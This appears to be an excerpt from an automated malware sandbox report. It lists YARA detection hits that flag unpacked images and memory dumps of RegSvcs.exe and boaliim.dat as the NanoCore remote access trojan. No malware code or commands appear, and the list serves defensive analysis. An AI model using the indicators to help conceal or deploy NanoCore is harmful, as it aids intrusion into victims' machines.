Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
